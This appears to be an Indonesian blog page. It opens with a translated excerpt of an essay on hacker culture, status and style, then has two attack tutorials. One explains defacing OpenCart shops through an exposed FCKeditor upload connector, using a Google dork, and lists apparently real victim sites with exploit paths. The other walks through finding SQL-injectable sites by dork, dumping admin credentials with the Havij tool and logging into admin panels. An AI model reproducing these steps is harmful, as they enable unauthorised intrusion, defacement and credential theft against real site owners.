Maksudnya lebih dari sekedar cara menggunakan browser (sebab kalau itu
siapa pun bisa), tapi mempelajari cara menulis HTML, bahasa markup Web.
Bila Anda belum menguasai pemrograman, lewat menulis HTML Anda akan
diajari beberapa kebiasaan mental yang akan membantu Anda belajar
pemrograman. Jadi, buatlah home page.

Hanya dengan membuat homepage tidak akan membuat Anda menjadi (bahkan
dekat pun tidak) seorang hacker. Web penuh dengan home page. Kebanyakan
hanyalah kotoran tanpa arti, tanpa isi — kotoran yang tampak indah,
tapi tetap kotoran (lebih jauh tentang ini, lihat The HTML Hell Page
).

Agar bermanfaat, halaman Anda harus mengandung /content/ — harus
menarik dan/atau berguna bagi hacker lain. Dan ini mengantar kita pada
bahasan berikutnya…

5. Status dalam Budaya Hacker

Seperti halnya dalam kebanyakan budaya lain tanpa ekonomi uang, dunia
hacker berjalan di atas reputasi. Anda berusaha menyelesaikan
persoalan-persoalan menarik, tapi seberapa menarik persoalan tersebut,
dan apakah solusi Anda benar-benar baik, merupakan sesuatu yang umumnya
hanya dapat dinilai oleh rekan sejawat atau atasan Anda.

Demikian juga, dalam permainan hacker, Anda menjaga nilai terutama lewat
pandangan hacker lain terhadap kemampuan Anda (inilah sebabnya Anda
belum benar-benar seorang hacker sampai hacker-hacker lain dengan
konsisten menyebut Anda seorang hacker). Kenyataan ini dikaburkan oleh
citra hacking sebagai pekerjaan menyendiri; juga oleh tabu budaya hacker
(yang kini perlahan-lahan menghilang namun masih tetap kuat) yang tidak
mengakui bahwa ego atau pengesahan dari luar berpengaruh pada motivasi
seseorang.

Tegasnya, dunia hacker merupakan apa yang disebut oleh para antropolog
sebagai /budaya memberi/. Kedudukan dan reputasi tidak diperoleh dengan
menguasai orang lain, atau dengan menjadi seseorang yang cantik, atau
dengan memiliki sesuatu yang tidak dimiliki orang lain, tapi dengan
memberikan sesuatu. Tepatnya, dengan memberikan waktu Anda, kreativitas,
dan hasil dari kemampuan Anda.

Pada dasarnya ada lima hal yang bisa dilakukan agar dihormati oleh hacker:

5.1 Menulis software open-source.

Yang pertama (yang paling inti dan paling tradisional) adalah menulis
program yang dipandang berguna atau mengasyikkan oleh hacker lain,
kemudian memberikan source programnya untuk digunakan oleh seluruh
budaya hacker.

(Dulu karya semacam ini disebut ’software bebas’ (free software), tapi
istilah ini memusingkan banyak orang karena mereka tidak tahu apa arti
tepat dari ‘free’. Sekarang banyak yang lebih menyukai istilah ’software
open-source ’.)

Para dewa^1 yang dipuja di dunia hacker yaitu mereka yang telah menulis
program besar yang berkemampuan tinggi dan dibutuhkan di mana-mana, lalu
memberikan program ini cuma-cuma, dan sekarang program itu telah dipakai
setiap orang.

5.2 Membantu menguji dan men-debug software open-source

Yang selanjutnya berjasa adalah mereka yang bertahan menggunakan dan
men-debug software open-source. Di dunia yang tak sempurna ini, tanpa
terhindarkan kita harus menghabiskan sebagian besar waktu pengembangan
software dalam tahap debugging. Karena itu setiap penulis software
open-source yang waras akan berpendapat bahwa penguji beta yang baik
(yang tahu bagaimana menjelaskan gejala masalah dengan jelas, bagaimana
melokalisir masalah, mampu mentolerir bug di rilis cepat, dan bersedia
menjalankan beberapa rutin diagnostik sederhana) itu amat sangat
berharga. Bahkan satu saja penguji beta sudah mampu membantu menjadikan
tahap debugging dari mimpi buruk panjang yang melelahkan menjadi hanya
gangguan yang justru menyehatkan.

Bila Anda seorang pemula, cobalah mencari program yang sedang dalam
tahap pengembangan, yang menarik bagi Anda, dan jadilah seorang penguji
beta yang baik. Dari sini Anda secara alamiah akan meningkat dari
membantu menguji program ke membantu memodifikasi program. Anda akan
belajar banyak, dan pada gilirannya nanti Anda pun akan memperoleh
bantuan dari orang lain saat membutuhkan.

5.3 Menerbitkan informasi yang bermanfaat.

Yang bagus juga untuk dilakukan yaitu mengumpulkan dan menyaring
informasi-informasi menarik dan berguna ke dalam halaman Web atau
dokumen seperti FAQ (Frequently Asked Questions — daftar jawaban
pertanyaan-pertanyaan yang sering diajukan orang), dan membuat
dokumen-dokumen ini mudah didapat orang.

Pemelihara FAQ teknis yang besar-besar juga mendapatkan hormat hampir
seperti para penulis software open-source.

5.4 Membantu terus berjalannya infrastruktur.

Budaya hacker (dan juga dalam hal ini pengembangan rekayasa Internet)
dijalankan oleh relawan. Banyak sekali pekerjaan yang dibutuhkan namun
bukan pekerjaan yang agung, yang harus dilakukan agar semuanya tetap
berjalan ? melakukan administrasi mailing list, moderasi newsgroup,
memelihara situs archive software yang besar, mengembangkan
dokumen-dokumen RFC serta standar teknis lainnya.

Mereka yang melakukan hal-hal seperti dengan baik juga dihormati, karena
orang tahu bahwa pekerjaan seperti ini menghabiskan banyak waktu dan
kalah mengasyikkan dibanding bermain dengan kode. Melakukan pekerjaan
seperti ini menunjukkan bahwa seseorang memiliki dedikasi.

5.5 Mengabdi kepada budaya hacker itu sendiri.

Terakhir, Anda dapat mengabdi dan menyebarluaskan budaya hacker (lewat,
misalnya, menulis panduan tepat bagi pemula tentang cara menjadi seorang
hacker :-) ). Anda tidak bisa melakukan hal ini kecuali telah
berkecimpung cukup lama dan menjadi figur yang cukup terkenal di salah
satu dari empat hal sebelumnya.

Budaya hacker tidak persis memiliki pemimpin, tapi memiliki pahlawan,
tetua suku, sejarawan, dan para jubir. Jika Anda telah cukup lama berada
di ‘medan tempur’, Anda dapat saja memperoleh salah satu dari
jabatan-jabatan ini. Peringatan: hacker tidak mempercayai ego tetua suku
yang terlampau mencolok, jadi berbahaya jika Anda terlalu terlihat untuk
berusaha menjadi terkenal. Cara yang benar seharusnya yaitu dengan
memposisikan diri sedemikian rupa sehingga jabatan tersebut jelas telah
Anda capai, lalu kemudian bersikap rendah hati dan ramah sehubungan
dengan kedudukan Anda tersebut.

6. Hubungan Hacker/Orang Nyentrik^2

Bertentangan dengan mitos populer, tidak perlu menjadi orang nyentrik
untuk menjadi hacker. Meski itu sebetulnya membantu, dan pada
kenyataannya banyak hacker yang merupakan orang nyentrik. Menjadi orang
yang tersisih secara sosial membantu Anda tetap memusatkan perhatian
pada hal-hal yang benar-benar penting, seperti berpikir dan hacking.

Karena alasan ini, banyak hacker mengadopsi label ‘nerd’ dan bahkan
menggunakan istilah yang lebih kasar ‘geek’ sebagai lencana kebanggaan
– cara memproklamasikan kebebasan dari tuntutan sosial. Lihatlah The
Geek Page untuk pembahasan
menyeluruh.

Bila Anda tetap dapat memusatkan perhatian pada hacking sampai menjadi
cukup ahli dan tetap memiliki kegiatan sosial, itu sah-sah saja. Hal ini
memang lebih mudah dilakukan sekarang ketimbang waktu saya seorang
pemula di tahun 1970-an; budaya mainstream saat ini jauh lebih ramah
pada para techno-nerd. Malah kini semakin banyak orang yang menyadari
bahwa hacker kadang merupakan kekasih yang berkualitas dan calon
pasangan hidup potensial. Lebih lanjut tentang hal ini, lihat Girl’s
Guide to Geek Guys .

Bila ketertarikan Anda pada hacking adalah karena Anda tidak mempunyai
kegiatan lain, itu juga tidak apa-apa — setidaknya tidak perlu
susah-susah memusatkan perhatian. Mudah-mudahan satu hari nanti Anda
akan memperoleh kehidupan sosial.

7. Panduan Gaya

Saya ulangi, untuk menjadi hacker, Anda perlu memasuki cara pikir
hacker. Hal-hal tertentu yang Anda lakukan saat jauh dari komputer
kadang membantu mencapainya. Tentu saja kegiatan-kegiatan ini bukan
sebagai pengganti hacking (tak ada yang dapat menggantikan hacking) tapi
banyak hacker melakukannya, dan merasa bahwa kegiatan tersebut secara
dasar berhubungan dengan intisari hacking.

* Membaca karya fiksi ilmiah. Datang ke pertemuan fiksi ilmiah
(salah satu jalan yang bagus untuk bertemu hacker dan proto-hacker).
* Mempelajari Zen, dan/atau berlatih bela diri. (Disiplin mental
yang diajarkan serupa dengan hacking dalam hal-hal penting.)
* Mengasah pendengaran musik. Belajar menghargai jenis-jenis musik
yang tidak lazim. Belajar menjadi ahli dalam bermain alat musik
tertentu, atau berlatih bernyanyi.
* Mengembangkan apresiasi akan permainan kata.
* Belajar menulis dalam bahasa asli (Sejumlah banyak hacker,
termasuk semua hacker terbaik yang saya kenal, adalah penulis yang
cakap).

Semakin banyak dari hal-hal di atas yang sudah Anda kerjakan, semakin
besar kemungkinan Anda adalah calon hacker berbakat. Kenapa hal-hal di
atas yang berhubungan dengan hacking tidak sepenuhnya jelas, tapi
semuanya berkaitan dengan gabungan kemampuan otak kiri dan kanan yang
penting (hacker harus dapat berpikir logis dan juga sewaktu-waktu harus
dapat melangkah keluar dari logika umum suatu permasalahan).

Terakhir, sebagian dari hal-hal yang /tidak/ sebaiknya dilakukan:

* Jangan menggunakan ID atau nama samaran yang konyol atau berlebihan.
* Jangan terlibat perang flame di Usenet (atau di mana pun).
* Jangan menggelari diri ‘cyberpunk’, jangan berurusan dengan para
‘cyberpunk’.
* Jangan mengirim posting atau email yang penuh salah ketik dan
bertata bahasa buruk.

Satu-satunya reputasi yang akan Anda dapatkan jika melakukan hal-hal di
atas adalah sebagai orang dungu. Ingatan hacker biasanya bagus –
mungkin dibutuhkan bertahun-tahun lamanya sebelum Anda dapat diterima
kembali

Read More

Cara Mudah Deface Melalui Opencart melalui Fck Editor

ini adalah site opencart !
dgn tipe deface Fck editor

karena mungkin
bagi kalian² yg udah master
ini ga penting lagi

tetapi
bagi mereka yg tidak tau ini
bermanfaat sebagai tolok ukur mereka !

cara kerja nya cukup mudah

-buka google dengan dork "Powered By OpenCart" site:com <- bisa diganti domain sesuai keinginan

-kalo udah ketemu web yg dicari masukin exploit dibelakang web nya admin/view/javascript/fckeditor/editor/filemanager
/connectors/test.html

- masuk ke fck editor nya

- ganti connector menjadi php

- browse file html / txt anda <-- hanya tipe txt / html klo php ga bisa

- upload

- cara mencari file kalian itu yg sering kalian bingung y kan !
yaiyalah wong gw pas pertama kali buat setengah jam gw ga tau letak file gw
maklum gw kan newbie kk
tetapi setelah gw lihat
disana ada

" url/file "

nah itu menandakan

letak file
terletak di

http://www.webkorban.com/file <-- nah disana lah letak file kalian !!

nah cukup sampai disini..

karna gw jg cpek ngetik
nih gw kasi web nya siap pakai !
jangan hina web nya .
tetapi liat aja perjuangan gw buat ngasi ilmu

gw jg bodoh sama seperti kalian
kalian beruntung sarana & prasana memdai
ga seperti gw
yg gw korbanin smua demi 1 kata " ILMU "

=====================================

http://www.thefins.co.uk/shop/admin/view...test.html#

http://digitalbazzar.co.uk/shop/admin/vi...test.html#

http://www.alphacomms.co.uk/store/admin/...test.html#

http://www.schoolshopper.com.au/admin/vi...test.html#

http://adventuresail.com.au/shop/admin/v...test.html#

http://www.makeapagescrapbooking.com.au/...test.html#

http://www.mvuschool.org/store/admin/vie...test.html#

http://www.eesnet.org/admin/view/javascr...test.html#

http://www.spiritdesigns.org/shop/admin/...test.html#

=====================================


SELAMAT BEREKSPERIMEN !

Read More

SQL Injection Dengan Tools Havij 1.15

Pertama2 Download Havi

Disini

Setelah di Download Extract dimana saja,buka Havijnya,jika ada tulisan tabctl32.ocx blabla,disitu ada file bernama tabctl32.ocx copy kan ke C:\WINDOWS\system32 atau run dan tuliskan C:\WINDOWS\system32 lalu paste disitu

Jika sudah tampilanya seperti ini:

Spoiler:

dan jika sudah tinggalkan sejenak,dan buka browser anda buka http://www.google.com kita akan memasukan dork

saya pakai dork inurl:.my/index.php?viewnews.php .my untuk website malaysia terserah kamu ganti menjadi .il .id .au atau yang lainya,atau bisa juga pakai dork ini inurl:index.php?viewnews.php

untuk lengkapnya download dork di

Spoiler:

sini

copykan dork ini ke google bar dan hasilnya seperti ini:

Spoiler:

klik link yang ada dan akan seperti ini :

Spoiler:

karena web ini telah saya Inject maka ini bisa untuk pembelajaran,setelah web terbuka kita cek vulnerabilitynya dengan tanda ' atau - maka akan seperti ini

Spoiler:

jika ada peringatan seperti itu artinya web Vulnerable

sekarang kita buka Havij yang tadi: dan masukan Linknya tanpa tanda '

Spoiler:

dan klik Analyze atau tanda panah ke kiri dan tunggu beberapa saat sampai tulisan status disamping wortel I'm Idle.

Jika sudah mendapatkan Databasenya klik Tables dan Get Tables seperti ini

Spoiler:

disitu database bernama scanav_cms,klik Get Tables dan tunggu beberapa saat sampai muncul Tablenya
disitu ada beberapa Table dan saya memilih member_password dan membermanager,ceklis keduanya dan klik Get Columns,dan Tunggu beberapa saat sampai seperti ini,jika tidak ada Table dan Columns seperti ini carilah pada table2 lain dan get columns,misalkan ada table tb_admin atau tb_users dll,biasanya disitu.

Spoiler:

setelah get data dan tunggu beberapa saat muncul Username dan Passwordnya

Spoiler:

jika mendapatkan password berupa angka bisa anda Md5 nanti akan ada di akhir,kita sudah mendapatkan username dan password nya,ternyata usernamenya admin dan passwordnya ********,jika sudah saatnya Find Admin atau menemukan Admin Login Page/Tempat Admin Login

Spoiler:

klik Find Admin dan masukan Situsnya kekotak yang tersedia,dan start tunggulah beberapa saat dan akan muncul seperti ini

Spoiler:

buka halaman adminya di browser,atau bisa klik kiri kotaknya dan klik Open URL

Spoiler:

seperti ini halaman adminya dan ketikan username serta passwordnya,dan klik Login,jika sudah Happy Hacking,silahkan kreasikan sesuka hati anda



eh iya hampir lupa soal MD5 nya,kalo anda mendapatkan Password berupa angka dan huruf mengacak begini caranya :

Spoiler:

Read More